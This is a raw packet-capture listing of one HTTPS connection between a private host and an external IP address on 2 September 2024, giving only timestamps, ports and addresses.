Sep 2, 2024 08:21:13.706281900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706346989 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706387043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706393957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706401110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706423998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706434011 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706458092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706480980 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706487894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706502914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.707021952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.707066059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.707076073 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.707082033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.707113981 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.739854097 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.739892006 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.739911079 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.739945889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.739962101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779323101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779356003 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779408932 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779433966 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779444933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779453039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779499054 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779505968 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779542923 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779561043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779612064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779676914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779725075 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779732943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779783964 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.779795885 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.779844046 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780006886 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780036926 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780056000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780071974 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780111074 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780142069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780185938 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780298948 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780344009 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780389071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780432940 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780467033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780513048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780615091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780652046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780662060 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780668974 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780694962 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780705929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780859947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780893087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780904055 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780915976 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780929089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780950069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780951023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.780962944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.780993938 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781115055 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781158924 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781177044 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781219006 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781338930 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781384945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781388044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781394005 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781416893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781431913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781439066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781450987 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781452894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781469107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781475067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781493902 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781709909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781752110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781759024 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781790972 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781800985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.781855106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.781980038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782012939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782022953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.782028913 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782043934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782053947 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.782088041 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.782093048 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782130957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.782134056 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782144070 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.782175064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.822784901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.822814941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.822879076 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.822906017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.822920084 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.862873077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.862926006 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.862955093 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863028049 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863046885 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863069057 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863079071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863097906 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863105059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863112926 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863131046 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863152981 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863158941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863190889 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863218069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863265038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863281965 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863287926 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863308907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863327026 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863440037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863491058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863636017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863670111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863686085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863692999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863703966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863712072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863748074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863758087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863765955 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863789082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863795042 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863830090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863837957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863845110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863871098 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863943100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863984108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.863986969 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.863996029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864025116 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864034891 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864070892 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864075899 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864085913 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864114046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864121914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864129066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864147902 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864159107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864171028 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864175081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864207029 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864238024 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864268064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864279985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864286900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864314079 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864383936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864428043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864433050 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864442110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864478111 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864649057 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864690065 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864695072 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864700079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864726067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864743948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864749908 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864759922 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864759922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864785910 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864794970 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864810944 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864948988 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864952087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.864960909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.864989042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.865000010 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.865005970 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.865053892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.867703915 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.905828953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.905869007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.905986071 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.906017065 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945566893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945636034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945696115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945719957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945736885 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945745945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945779085 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945792913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945800066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945813894 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945873022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945914984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945915937 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945925951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.945960999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.945971012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946019888 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946037054 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946078062 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946165085 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946213007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946242094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946284056 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946408987 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946456909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946537018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946569920 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946588993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946594000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946605921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946611881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946645975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946655035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946655035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946662903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946690083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946703911 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946778059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946825027 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946938038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946974039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.946988106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.946994066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947016954 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947187901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947211027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947230101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947237968 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947251081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947356939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947396994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947403908 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947439909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947551966 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947592974 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947598934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947603941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947623968 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947639942 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947647095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947658062 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947762012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947798014 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947804928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947810888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947839975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947916985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947952986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.947953939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947964907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947992086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.947993040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.948030949 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.948038101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.948074102 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.964975119 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.988490105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.988560915 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.988578081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.988599062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.988626003 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.988641977 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.032952070 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.032998085 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033050060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033071041 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033083916 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033098936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033109903 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033130884 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033139944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033174992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033185005 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033195972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033219099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033222914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033240080 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033252001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033265114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033266068 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033308983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033314943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033355951 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033411026 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033452034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033458948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033464909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033487082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033488035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033507109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033513069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033524036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033530951 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033560991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033564091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033576012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033617020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033744097 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033786058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033787966 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033797026 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033827066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033828020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033871889 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033878088 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.033920050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.033982992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034029961 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034039021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034085035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034259081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034300089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034308910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034343958 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034491062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034527063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034538984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034543991 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.034565926 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.034579992 CEST	49744	443	192.168.2.6	84.32.84.152
